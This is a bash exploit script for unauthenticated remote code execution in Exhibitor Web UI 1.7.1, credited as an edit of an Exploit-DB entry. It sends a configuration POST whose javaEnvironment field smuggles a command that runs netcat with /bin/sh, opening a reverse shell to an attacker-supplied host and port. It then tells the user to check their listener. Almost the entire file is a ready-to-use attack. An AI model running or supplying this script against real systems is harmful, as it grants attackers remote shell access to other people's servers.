#!/bin/bash


echo "

------------------------------------------------------------------------------
 _____      _     _ _     _ _              __        __   _       _   _ ___
| ____|_  _| |__ (_) |__ (_) |_ ___  _ __  \ \      / /__| |__   | | | |_ _|
|  _| \ \/ / '_ \| | '_ \| | __/ _ \| '__|  \ \ /\ / / _ \ '_ \  | | | || |
| |___ >  <| | | | | |_) | | || (_) | |      \ V  V /  __/ |_) | | |_| || |
|_____/_/\_\_| |_|_|_.__/|_|\__\___/|_|       \_/\_/ \___|_.__/   \___/|___|

 _  _____ _           ____   ____ _____
/ ||___  / |         |  _ \ / ___| ____|
| |   / /| |  _____  | |_) | |   |  _|
| |_ / /_| | |_____| |  _ <| |___| |___
|_(_)_/(_)_|         |_| \_\\____|_____|

------------------------------------------------------------------------------
"

echo -e "\e[1;33mOriginal exploit : https://www.exploit-db.com/exploits/48654\n\e[0m"
echo -e "\e[1;31m----------------This bash script is edited by @thehunt1s0n--------------------\n\e[0m"


# Check if correct number of arguments is provided
if [ $# -ne 4 ]; then
  echo "Usage: $0 <host> <port> <attacker_host> <attacker_port>" 
  exit 1
fi

HOST="$1"
PORT="$2"
ATTACKER_HOST="$3"
ATTACKER_PORT="$4"
URL="http://$HOST:$PORT/exhibitor/v1/config/set"

#Run the curl command with POST method and inline JSON data.

#JSON data is what comes after the d option in curl , it could be captured using burpsuite while comiting the changes in the config tab.

#you might need to change JSON data if the exploit don't work. 

response=$(curl -s -X POST -d '{"zookeeperInstallDirectory":"/opt/zookeeper","zookeeperDataDirectory":"/zookeeper/data","zookeeperLogDirectory":"","logIndexDirectory":"","autoManageInstancesSettlingPeriodMs":"10000","autoManageInstancesFixedEnsembleSize":"0","autoManageInstancesApplyAllAtOnce":"1","observerThreshold":"3","serversSpec":"1:pelican","javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)","log4jProperties":"","clientPort":"2181","connectPort":"2888","electionPort":"3888","checkMs":"2000","cleanupPeriodMs":"200000","cleanupMaxFiles":"10","backupPeriodMs":"60000","backupMaxStoreMs":"86400000","autoManageInstances":"1","zooCfgExtra":{"syncLimit":"5","tickTime":"2000","initLimit":"10"},"backupExtra":{},"serverId":1}' $URL)

# Check the exit status

if [ $? -eq 0 ]; then
    echo -e "\e[1;32mCurl command executed successfully, check your listener.\e[0m"
else
    echo -e "\e[1;31mSomething is wrong\e[0m"
fi